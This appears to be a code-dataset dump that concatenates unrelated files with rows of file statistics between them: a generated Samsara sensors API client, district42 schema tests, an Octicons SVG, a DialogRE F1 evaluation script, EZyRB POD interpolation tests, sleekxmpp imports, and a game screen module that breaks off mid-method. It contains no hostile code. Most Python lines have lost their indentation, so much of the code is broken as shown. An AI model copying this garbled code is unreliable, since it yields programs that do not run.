>>> thread = api.get_sensors_history_with_http_info(access_token, history_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HistoryParam history_param: Group ID, time range and resolution, and list of sensor ID, field pairs to query. (required)
:return: SensorHistoryResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'history_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors_history" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors_history`")
# verify the required parameter 'history_param' is set
if ('history_param' not in params) or (params['history_param'] is None):
raise ValueError("Missing the required parameter `history_param` when calling `get_sensors_history`")
collection_formats = {}
resource_path = '/sensors/history'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'history_param' in params:
body_params = params['history_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SensorHistoryResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_sensors_humidity(self, access_token, sensor_param, **kwargs):
"""
/sensors/humidity
Get humidity for requested sensors. This method returns the current relative humidity for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_humidity(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: HumidityResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_humidity_with_http_info(access_token, sensor_param, **kwargs)
else:
(data) = self.get_sensors_humidity_with_http_info(access_token, sensor_param, **kwargs)
return data
def get_sensors_humidity_with_http_info(self, access_token, sensor_param, **kwargs):
"""
/sensors/humidity
Get humidity for requested sensors. This method returns the current relative humidity for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_humidity_with_http_info(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: HumidityResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'sensor_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors_humidity" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors_humidity`")
# verify the required parameter 'sensor_param' is set
if ('sensor_param' not in params) or (params['sensor_param'] is None):
raise ValueError("Missing the required parameter `sensor_param` when calling `get_sensors_humidity`")
collection_formats = {}
resource_path = '/sensors/humidity'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'sensor_param' in params:
body_params = params['sensor_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='HumidityResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_sensors_temperature(self, access_token, sensor_param, **kwargs):
"""
/sensors/temperature
Get temperature for requested sensors. This method returns the current ambient temperature (and probe temperature if applicable) for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_temperature(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: TemperatureResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_temperature_with_http_info(access_token, sensor_param, **kwargs)
else:
(data) = self.get_sensors_temperature_with_http_info(access_token, sensor_param, **kwargs)
return data
def get_sensors_temperature_with_http_info(self, access_token, sensor_param, **kwargs):
"""
/sensors/temperature
Get temperature for requested sensors. This method returns the current ambient temperature (and probe temperature if applicable) for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_temperature_with_http_info(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: TemperatureResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'sensor_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors_temperature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors_temperature`")
# verify the required parameter 'sensor_param' is set
if ('sensor_param' not in params) or (params['sensor_param'] is None):
raise ValueError("Missing the required parameter `sensor_param` when calling `get_sensors_temperature`")
collection_formats = {}
resource_path = '/sensors/temperature'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'sensor_param' in params:
body_params = params['sensor_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TemperatureResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
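# ---------------------------------------------------------------------------
# Usage sketch (not part of the generated client; the token and group values
# below are placeholders, not real credentials):
if __name__ == '__main__':
    from pprint import pprint

    api = SensorsApi()

    def on_response(response):
        # Receives the deserialized response once an async request finishes.
        pprint(response)

    # Synchronous: blocks and returns the parsed response object.
    #   sensors = api.get_sensors('<access_token>', group_param)
    # Asynchronous: returns the request thread immediately.
    #   thread = api.get_sensors('<access_token>', group_param,
    #                            callback=on_response)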
| 47.238956 | 1,080 | 0.609224 | 2,546 | 23,525 | 5.412019 | 0.098979 | 0.057479 | 0.016257 | 0.020901 | 0.8923 | 0.865447 | 0.849336 | 0.839321 | 0.839321 | 0.830757 | 0 | 0.000931 | 0.315112 | 23,525 | 497 | 1,081 | 47.334004 | 0.85427 | 0.380234 | 0 | 0.741803 | 0 | 0 | 0.187219 | 0.033224 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036885 | false | 0 | 0.028689 | 0 | 0.118852 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cfc4cd6005db9cf1b8f37ec9800f76bed23a0fe2 | 2,953 | py | Python | tests/dict/test_dict_add.py | nikitanovosibirsk/district42 | 0c13248919fc96bde16b9634a8ea468e4882752a | [
"Apache-2.0"
] | 1 | 2016-09-16T04:09:19.000Z | 2016-09-16T04:09:19.000Z | tests/dict/test_dict_add.py | nikitanovosibirsk/district42 | 0c13248919fc96bde16b9634a8ea468e4882752a | [
"Apache-2.0"
] | 2 | 2021-06-14T05:53:49.000Z | 2022-02-01T14:26:31.000Z | tests/dict/test_dict_add.py | nikitanovosibirsk/district42 | 0c13248919fc96bde16b9634a8ea468e4882752a | [
"Apache-2.0"
] | null | null | null | from baby_steps import given, then, when
from district42 import optional, schema
def test_dict_add():
with given:
sch1 = schema.dict({"id": schema.int})
sch2 = schema.dict({"name": schema.str})
with when:
res = sch1 + sch2
with then:
assert res == schema.dict({
"id": schema.int,
"name": schema.str
})
assert sch1 == schema.dict({"id": schema.int})
assert sch2 == schema.dict({"name": schema.str})
def test_dict_add_override():
with given:
sch1 = schema.dict({"id": schema.int})
sch2 = schema.dict({"id": schema.str})
with when:
res = sch1 + sch2
with then:
assert res == schema.dict({
"id": schema.str
})
assert sch1 == schema.dict({"id": schema.int})
assert sch2 == schema.dict({"id": schema.str})
def test_dict_add_optional():
with given:
sch1 = schema.dict({"id": schema.int})
sch2 = schema.dict({"name": schema.str, optional("created_at"): schema.int})
with when:
res = sch1 + sch2
with then:
assert res == schema.dict({
"id": schema.int,
"name": schema.str,
optional("created_at"): schema.int
})
assert sch1 == schema.dict({"id": schema.int})
assert sch2 == schema.dict({"name": schema.str, optional("created_at"): schema.int})
def test_dict_add_optional_override():
with given:
sch1 = schema.dict({"id": schema.int, optional("created_at"): schema.int})
sch2 = schema.dict({"name": schema.str, "created_at": schema.int})
with when:
res = sch1 + sch2
with then:
assert res == schema.dict({
"id": schema.int,
"name": schema.str,
"created_at": schema.int
})
assert sch1 == schema.dict({"id": schema.int, optional("created_at"): schema.int})
assert sch2 == schema.dict({"name": schema.str, "created_at": schema.int})
def test_dict_add_relaxed_left():
with given:
sch1 = schema.dict({"id": schema.int, ...: ...})
sch2 = schema.dict({"name": schema.str})
with when:
res = sch1 + sch2
with then:
assert res == schema.dict({
"id": schema.int,
...: ...,
"name": schema.str
})
assert sch1 == schema.dict({"id": schema.int, ...: ...})
assert sch2 == schema.dict({"name": schema.str})
def test_dict_add_relaxed_right():
with given:
sch1 = schema.dict({"id": schema.int})
sch2 = schema.dict({"name": schema.str, ...: ...})
with when:
res = sch1 + sch2
with then:
assert res == schema.dict({
"id": schema.int,
"name": schema.str,
...: ...,
})
assert sch1 == schema.dict({"id": schema.int})
assert sch2 == schema.dict({"name": schema.str, ...: ...})
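# Sketch distilled from the relaxed-schema tests above: the `...: ...` entry
# survives addition, so merging with a relaxed operand yields a relaxed dict.
#   merged = schema.dict({"id": schema.int, ...: ...}) + schema.dict({"name": schema.str})
#   assert merged == schema.dict({"id": schema.int, ...: ..., "name": schema.str})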
| 27.091743 | 92 | 0.531663 | 348 | 2,953 | 4.428161 | 0.086207 | 0.194679 | 0.155743 | 0.233615 | 0.932511 | 0.913043 | 0.895522 | 0.895522 | 0.866321 | 0.862427 | 0 | 0.01842 | 0.301388 | 2,953 | 108 | 93 | 27.342593 | 0.728551 | 0 | 0 | 0.722892 | 0 | 0 | 0.060955 | 0 | 0 | 0 | 0 | 0 | 0.216867 | 1 | 0.072289 | false | 0 | 0.024096 | 0 | 0.096386 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cfed8c77913c552481342c4e65b8de66e0daa80f | 950 | py | Python | octicons16px/tools.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | 1 | 2021-01-28T06:47:39.000Z | 2021-01-28T06:47:39.000Z | octicons16px/tools.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | null | null | null | octicons16px/tools.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | null | null | null |
OCTICON_TOOLS = """
<svg class="octicon octicon-tools" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M5.433 2.304A4.494 4.494 0 003.5 6c0 1.598.832 3.002 2.09 3.802.518.328.929.923.902 1.64v.008l-.164 3.337a.75.75 0 11-1.498-.073l.163-3.33c.002-.085-.05-.216-.207-.316A5.996 5.996 0 012 6a5.994 5.994 0 012.567-4.92 1.482 1.482 0 011.673-.04c.462.296.76.827.76 1.423v2.82c0 .082.041.16.11.206l.75.51a.25.25 0 00.28 0l.75-.51A.25.25 0 009 5.282V2.463c0-.596.298-1.127.76-1.423a1.482 1.482 0 011.673.04A5.994 5.994 0 0114 6a5.996 5.996 0 01-2.786 5.068c-.157.1-.209.23-.207.315l.163 3.33a.75.75 0 11-1.498.074l-.164-3.345c-.027-.717.384-1.312.902-1.64A4.496 4.496 0 0012.5 6a4.494 4.494 0 00-1.933-3.696c-.024.017-.067.067-.067.16v2.818a1.75 1.75 0 01-.767 1.448l-.75.51a1.75 1.75 0 01-1.966 0l-.75-.51A1.75 1.75 0 015.5 5.282V2.463c0-.092-.043-.142-.067-.159zm.01-.005z"></path></svg>
"""
| 190 | 924 | 0.676842 | 244 | 950 | 2.631148 | 0.508197 | 0.023364 | 0.023364 | 0.028037 | 0.161994 | 0.115265 | 0 | 0 | 0 | 0 | 0 | 0.573733 | 0.086316 | 950 | 4 | 925 | 237.5 | 0.165899 | 0 | 0 | 0 | 0 | 0.333333 | 0.975764 | 0.420443 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cfef93a27046eab551c52712e0a77ea8daa87a0f | 1,403 | py | Python | DialogRE/bert/calc-categorized-f1.py | muyeby/AMR-Dialogue | 261535c407be6c166016e4759bc81176b1c99957 | [
"MIT"
] | 38 | 2021-05-14T15:59:43.000Z | 2022-03-24T14:43:41.000Z | DialogRE/bert/calc-categorized-f1.py | muyeby/AMR-Dialogue | 261535c407be6c166016e4759bc81176b1c99957 | [
"MIT"
] | 3 | 2021-08-03T09:50:59.000Z | 2022-03-30T03:17:19.000Z | DialogRE/bert/calc-categorized-f1.py | muyeby/AMR-Dialogue | 261535c407be6c166016e4759bc81176b1c99957 | [
"MIT"
] | 3 | 2021-08-01T23:54:12.000Z | 2021-10-05T01:37:14.000Z | # coding:utf-8
def evaluate(devp, data):
    # Micro-averaged precision/recall/F1 over predicted relation ids;
    # id 36 is excluded from both the gold and the system counts.
index = 0
correct_sys, all_sys = 0, 0
correct_gt = 0
for i in range(len(data)):
for j in range(len(data[i][1])): # K
for id in data[i][1][j]["rid"]:
if id != 36:
correct_gt += 1
if id in devp[index]:
correct_sys += 1
for id in devp[index]:
if id != 36:
all_sys += 1
index += 1
precision = correct_sys / all_sys if all_sys != 0 else 1
recall = correct_sys / correct_gt if correct_gt != 0 else 0
f_1 = 2 * precision * recall / (precision + recall) if precision + recall != 0 else 0
return precision, recall, f_1
def evaluate_new(devp, ref):
    correct_sys, all_sys = 0, 0
    correct_gt = 0
    assert len(devp) == len(ref)
    for i in range(len(ref)):
        for id in ref[i]:
            # relation id 36 is excluded from all counts
            if id != 36:
                correct_gt += 1
                if id in devp[i]:
                    correct_sys += 1
        for id in devp[i]:
            if id != 36:
                all_sys += 1
precision = correct_sys / all_sys if all_sys != 0 else 1
recall = correct_sys / correct_gt if correct_gt != 0 else 0
f_1 = 2 * precision * recall / (precision + recall) if precision + recall != 0 else 0
return precision, recall, f_1
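# Tiny illustrative check of the metric above (made-up label sets, not
# DialogRE data; id 36 is the excluded label):
if __name__ == "__main__":
    preds = [[1], [3], [36]]
    golds = [[1], [2], [36]]
    # correct_gt = 2, correct_sys = 1, all_sys = 2 -> P = R = F1 = 0.5
    print(evaluate_new(preds, golds))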
| 31.177778 | 89 | 0.510335 | 205 | 1,403 | 3.35122 | 0.165854 | 0.116448 | 0.075691 | 0.093159 | 0.850073 | 0.819505 | 0.783115 | 0.72198 | 0.72198 | 0.72198 | 0 | 0.051462 | 0.390592 | 1,403 | 44 | 90 | 31.886364 | 0.752047 | 0.009979 | 0 | 0.756757 | 0 | 0 | 0.002166 | 0 | 0 | 0 | 0 | 0 | 0.027027 | 1 | 0.054054 | false | 0 | 0 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5caa01c1bf83a600dd0774deba8507ac89a07a8f | 4,856 | py | Python | tests/test_podinterpolation.py | twisterbboy/EZyRB | ab72235ec6703f4ac58d5faebaade40dfb6d326c | [
"MIT"
] | null | null | null | tests/test_podinterpolation.py | twisterbboy/EZyRB | ab72235ec6703f4ac58d5faebaade40dfb6d326c | [
"MIT"
] | null | null | null | tests/test_podinterpolation.py | twisterbboy/EZyRB | ab72235ec6703f4ac58d5faebaade40dfb6d326c | [
"MIT"
] | null | null | null | from unittest import TestCase
import numpy as np
import os
from ezyrb.podinterpolation import PODInterpolation
from ezyrb.parametricspace import ParametricSpace
from ezyrb.points import Points
from ezyrb.snapshots import Snapshots
from ezyrb.ndinterpolator.linear import LinearInterpolator
class TestPODInterpolation(TestCase):
def test_pod(self):
space = PODInterpolation()
def test_generate(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
snap.append("tests/test_datasets/matlab_03.vtk")
space.generate(mu, snap)
assert space.pod_basis.shape == (2500, 4)
def test_interpolator(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
snap.append("tests/test_datasets/matlab_03.vtk")
space.generate(mu, snap)
assert isinstance(space.interpolator, LinearInterpolator)
def test_call(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
#mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
#snap.append("tests/test_datasets/matlab_03.vtk")
space.generate(mu, snap)
solution = space([0, 0])
assert solution.shape == (2500, 1)
def test_save(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
snap.append("tests/test_datasets/matlab_03.vtk")
space.generate(mu, snap)
space.save("tests/test_datasets/podspace")
assert os.path.isfile("tests/test_datasets/podspace")
#os.remove("tests/test_datasets/podspace")
def test_load(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
snap.append("tests/test_datasets/matlab_03.vtk")
space.generate(mu, snap)
space.save("tests/test_datasets/podspace")
another_space = ParametricSpace.load("tests/test_datasets/podspace")
assert another_space.pod_basis.shape == (2500, 4)
os.remove("tests/test_datasets/podspace")
def test_loo_error(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
snap.append("tests/test_datasets/matlab_03.vtk")
error = space.loo_error(mu, snap)
assert error.shape == (4, )
def test_loo_error2(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
snap.append("tests/test_datasets/matlab_03.vtk")
error = space.loo_error(mu, snap)
np.testing.assert_almost_equal(max(error), 0.149130165577, decimal=4)
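# Condensed API walk-through distilled from the tests above (file paths and
# parameter points are the same ones the tests use):
#   space = PODInterpolation()
#   space.generate(mu, snap)                  # build POD basis + interpolator
#   solution = space([0, 0])                  # evaluate at a new parameter
#   space.save("tests/test_datasets/podspace")
#   space2 = ParametricSpace.load("tests/test_datasets/podspace")
#   err = space.loo_error(mu, snap)           # leave-one-out error estimate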
| 37.353846 | 77 | 0.622323 | 610 | 4,856 | 4.811475 | 0.114754 | 0.104259 | 0.196934 | 0.0954 | 0.770698 | 0.758092 | 0.742419 | 0.742419 | 0.715162 | 0.715162 | 0 | 0.038472 | 0.223847 | 4,856 | 129 | 78 | 37.643411 | 0.740249 | 0.022446 | 0 | 0.73913 | 0 | 0 | 0.236509 | 0.217327 | 0 | 0 | 0 | 0 | 0.06087 | 1 | 0.069565 | false | 0 | 0.095652 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5cb2ee3d06ddcf886f55d4150d38653c7d632df6 | 349 | py | Python | sleekxmpp/thirdparty/suelta/mechanisms/__init__.py | calendar42/SleekXMPP--XEP-0080- | d7bd5fd29f26a5d7de872a49ff63a353b8043e49 | [
"BSD-3-Clause"
] | 1 | 2019-04-12T12:20:12.000Z | 2019-04-12T12:20:12.000Z | sleekxmpp/thirdparty/suelta/mechanisms/__init__.py | vijayp/SleekXMPP | b2e7f57334d27f140f079213c2016615b7168742 | [
"BSD-3-Clause"
] | null | null | null | sleekxmpp/thirdparty/suelta/mechanisms/__init__.py | vijayp/SleekXMPP | b2e7f57334d27f140f079213c2016615b7168742 | [
"BSD-3-Clause"
] | 1 | 2020-05-06T18:46:53.000Z | 2020-05-06T18:46:53.000Z | from sleekxmpp.thirdparty.suelta.mechanisms.anonymous import ANONYMOUS
from sleekxmpp.thirdparty.suelta.mechanisms.plain import PLAIN
from sleekxmpp.thirdparty.suelta.mechanisms.cram_md5 import CRAM_MD5
from sleekxmpp.thirdparty.suelta.mechanisms.digest_md5 import DIGEST_MD5
from sleekxmpp.thirdparty.suelta.mechanisms.scram_hmac import SCRAM_HMAC
| 58.166667 | 72 | 0.885387 | 46 | 349 | 6.586957 | 0.282609 | 0.214521 | 0.379538 | 0.478548 | 0.663366 | 0.277228 | 0 | 0 | 0 | 0 | 0 | 0.012158 | 0.057307 | 349 | 5 | 73 | 69.8 | 0.908815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7a505a139b503133df8915a9582fcf8bf821c355 | 5,140 | py | Python | scripts/screen.py | saidwho12/JulyGame | 064654aaaf516931a074ce4d5021f2ecdbe621e0 | [
"MIT"
] | null | null | null | scripts/screen.py | saidwho12/JulyGame | 064654aaaf516931a074ce4d5021f2ecdbe621e0 | [
"MIT"
] | null | null | null | scripts/screen.py | saidwho12/JulyGame | 064654aaaf516931a074ce4d5021f2ecdbe621e0 | [
"MIT"
] | null | null | null | from pyglfw.libapi import *
from scripts import (gui,
input_manager)
class Screen:
def __init__(self, engine):
self.engine = engine
self.elements = {}
def on_enter(self):
pass
def on_leave(self):
pass
def on_joy_stick(self, axis, dx, dy):
pass
def on_joy_button_down(self, button):
pass
def on_joy_button_up(self, button):
pass
def on_key_down(self, key):
pass
def on_key_up(self, key):
pass
def on_mouse_down(self, button, x, y):
pass
def on_mouse_up(self, button, x, y):
pass
def on_mouse_move(self, x, y, dx, dy):
pass
def on_size(self, w, h):
pass
def draw(self, renderer):
        for e in self.elements.values():
e.draw(renderer)
def update(self, dt):
pass
class GameScreen(Screen):
def __init__(self, engine):
self.engine = engine
self.elements = {'game_display': gui.GameDisplay(self.engine),
'health': gui.StatBar(self.engine, 'button_down', (0, 1, 0), 0),
'fuel': gui.StatBar(self.engine, 'button_down', (0, 0, 1), 1)}
def on_enter(self):
self.engine.input_manager.toggle_mouse_lock(True)
def on_leave(self):
self.engine.input_manager.toggle_mouse_lock(False)
def on_joy_stick(self, stick, dx, dy):
        if stick == 0:
            self.engine.game_manager.player.set_input(dx, dy)
        elif stick == 1:
            self.engine.renderer.camera.rotate(dx, dy)
def on_joy_button_down(self, button):
if button == input_manager.A:
self.engine.game_manager.player.do_jump()
elif button == input_manager.Y:
self.engine.game_manager.player.drive()
elif button == input_manager.LT_BUTTON:
self.engine.game_manager.player.left_trigger_down()
elif button == input_manager.RT_BUTTON:
self.engine.game_manager.player.right_trigger_down()
elif button == input_manager.START:
self.engine.screen_manager.transition('menu')
def on_joy_button_up(self, button):
if button == input_manager.A:
self.engine.game_manager.player.stop_jump()
elif button == input_manager.LT_BUTTON:
self.engine.game_manager.player.left_trigger_up()
elif button == input_manager.RT_BUTTON:
self.engine.game_manager.player.right_trigger_up()
def on_key_down(self, key):
        if key == GLFW_KEY_D:
            self.engine.game_manager.player.add_input(1, 0)
        elif key == GLFW_KEY_A:
            self.engine.game_manager.player.add_input(-1, 0)
        elif key == GLFW_KEY_W:
            self.engine.game_manager.player.add_input(0, -1)
        elif key == GLFW_KEY_S:
            self.engine.game_manager.player.add_input(0, 1)
        elif key == GLFW_KEY_E:
            self.engine.game_manager.player.drive()
        elif key == GLFW_KEY_SPACE:
            self.engine.game_manager.player.do_jump()
def on_key_up(self, key):
        if key == GLFW_KEY_D:
            self.engine.game_manager.player.add_input(-1, 0)
        elif key == GLFW_KEY_A:
            self.engine.game_manager.player.add_input(1, 0)
        elif key == GLFW_KEY_W:
            self.engine.game_manager.player.add_input(0, 1)
        elif key == GLFW_KEY_S:
            self.engine.game_manager.player.add_input(0, -1)
        elif key == GLFW_KEY_SPACE:
            self.engine.game_manager.player.stop_jump()
def on_mouse_down(self, button, x, y):
if button == 1:
self.engine.game_manager.player.left_trigger_down()
elif button == 0:
self.engine.game_manager.player.right_trigger_down()
def on_mouse_up(self, button, x, y):
if button == 1:
self.engine.game_manager.player.left_trigger_up()
elif button == 0:
self.engine.game_manager.player.right_trigger_up()
def on_mouse_move(self, x, y, dx, dy):
self.engine.renderer.camera.rotate(dx, dy)
class MenuScreen(Screen):
def __init__(self, engine):
self.engine = engine
self.play_button = gui.Button(self.engine, (0, 0), (.2, .2),
'button_down', 'button_normal',
'button_over')
self.elements = {'background': gui.Background(self.engine, 'download'),
'play_button': self.play_button}
def on_mouse_move(self, x, y, dx, dy):
